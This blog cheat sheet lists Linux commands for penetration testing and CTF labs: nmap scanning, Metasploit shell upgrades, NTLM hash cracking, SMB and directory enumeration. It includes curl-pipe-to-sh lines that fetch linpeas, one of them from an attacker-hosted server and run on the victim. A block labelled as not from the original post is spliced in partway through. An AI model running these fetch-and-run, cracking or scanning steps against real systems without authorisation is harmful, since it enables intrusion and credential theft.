Abhinav Kumar · Hacking 101 · 2 min read
Linux Commands for Hacking and Security
Linux commands and shortcuts very often used by hackers, security professionals and CTF players.
Linux commands that are often used by hackers, security professionals and CTF players. We will avoid any payloads or one-liner exploits (they will be covered on a different page sometime). Updated - October 02, 2023.
Table of Contents
- Add Target to hosts file
- Nmap
- Metasploit
- Cracking hash with hashcat
- Extract Files
- SSH Connection
- Text Filter
- SMB Enumeration
- netcat
- Linpeas
- Python Simple HTTP Server
- Wordpress CMS Vulnerability Scanning
- Directory Enumeration
- Reading a File
- Replace in File
Add Target to hosts file
┌──(abhinav㉿ETHICALHACKX)-[~]
└─$ echo '10.10.196.20 blue.thm' | sudo tee -a /etc/hosts
[sudo] password for abhinav:
10.10.196.20 blue.thm
Nmap
#for TCP Scan
sudo nmap -sC -sV -p- -T5 -Pn targethost
#for UDP Scan
sudo nmap -sU -sV -p- -T5 -Pn targethost
# Store scan results for ports separated by comma.
┌──(abhinav㉿ETHICALHACKX)-[~]
└─$ ports=$(nmap -p- --min-rate=1000 -T4 cronos.htb | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed 's/,$//')
# Check which ports are found
┌──(abhinav㉿ETHICALHACKX)-[~]
└─$ echo $ports
22,53,80,9227,19041,30100
# Pass the information in -p argument as $ports
┌──(abhinav㉿ETHICALHACKX)-[~]
└─$ sudo nmap -sC -sV -A -O -T5 -p$ports cronos.htb
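As an added example (not from the original post), the port-extraction one-liner above rewritten as a reusable function that keeps only the ports nmap reports as open (the one-liner also picks up closed/filtered rows when nmap prints them) and strips the trailing comma; it is run here against a constructed sample of nmap output, not a real scan:

```shell
#!/bin/sh
# Added example: turn nmap's normal output into a comma-separated list of
# OPEN ports, ready to hand to a second, detailed scan with -p.
extract_open_ports() {
    # Reads nmap output on stdin; prints e.g. 22,53,80 (empty if nothing is open).
    grep -E '^[0-9]+/(tcp|udp) +open' \
        | cut -d '/' -f 1 \
        | tr '\n' ',' \
        | sed 's/,$//'
}

# Constructed sample of nmap normal output (not a real scan result).
SAMPLE_SCAN='Starting Nmap 7.94 ( https://nmap.org )
Nmap scan report for cronos.htb (10.10.10.13)
PORT      STATE    SERVICE
22/tcp    open     ssh
53/tcp    open     domain
80/tcp    open     http
443/tcp   closed   https
8080/tcp  filtered http-proxy
Nmap done: 1 IP address (1 host up) scanned in 12.34 seconds'

# Build the list once, then reuse it for the detailed scan.
ports=$(printf '%s\n' "$SAMPLE_SCAN" | extract_open_ports)
echo "open ports: $ports"
# In a real run: nmap -p- --min-rate=1000 -T4 cronos.htb | extract_open_ports
# followed by: sudo nmap -sC -sV -p"$ports" cronos.htb
```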
Metasploit
Start Metasploit with database
┌──(abhinav㉿ETHICALHACKX)-[~]
└─$ systemctl start postgresql
┌──(abhinav㉿ETHICALHACKX)-[~]
└─$ msfdb init
Creating database user 'msf'
Enter password for new role:
Enter it again:
Creating databases 'msf' and 'msf_test'
Creating configuration file in /usr/share/metasploit-framework/config/database.yml
Creating initial database schema
Metasploit Shell Upgrade to Meterpreter
sessions -u 3     # upgrade session 3 to Meterpreter
sessions -u -1    # upgrade the most recently opened session
# Same thing done explicitly through the post module
use post/multi/manage/shell_to_meterpreter
run session=-1
Cracking hash with John
┌──(abhinav㉿ETHICALHACKX)-[~]
└─$ john hash --format=NT --wordlist=/usr/share/wordlists/rockyou.txt
Cracking hash with hashcat
Windows NTLM Hash
hashcat -m 1000 -a 0 hash /usr/share/wordlists/rockyou.txt.gz
Extract Files
Gz Files
gunzip archive.gz
tar Files
tar -xvzf archive.tar.gz
SSH Connection
ssh username@host -oHostKeyAlgorithms=+ssh-dss
Text Filter
grep -i pattern file   # -i: case-insensitive match
grep -v pattern file   # -v: exclude lines that match
SMB Enumeration
nmap
nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse target_HOST
smbclient //IP/directory
Mount NFS Share
make directory locally and mount it
mkdir /mnt/sampleDIR
sudo mount IP:/folder /mnt/sampleDIR
netcat
get version via banner
nc IP port
Linpeas
From github
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
Python Simple HTTP Server
python3 -m http.server 7777
curl 10.10.10.10:7777/linpeas.sh | sh   # run on the victim; port matches the server above
Wordpress CMS Vulnerability Scanning
wpscan --url https://brainfuck.htb --disable-tls-checks
Directory Enumeration
┌──(abhinav㉿ETHICALHACKX)-[~]
└─$ ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://cronos.htb/FUZZ -mc 200,403 -c -t 400
┌──(abhinav㉿ETHICALHACKX)-[~]
└─$ gobuster dir -u http://cronos.htb/ --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --threads 200 --quiet
Reading a File
cat filename                             # print the whole file
head filename                            # first 10 lines
head -20 filepathandname                 # first 20 lines
tail filename                            # last 10 lines
tail -20 filename                        # last 20 lines
cat filename | grep "word_to_filter"     # only lines containing the word
more filename                            # page through the file
less filename                            # page through, scroll in both directions
Replace in File
sed 's/wordtoreplace/wordtoreplacewith/g' /filepath > outputfilepath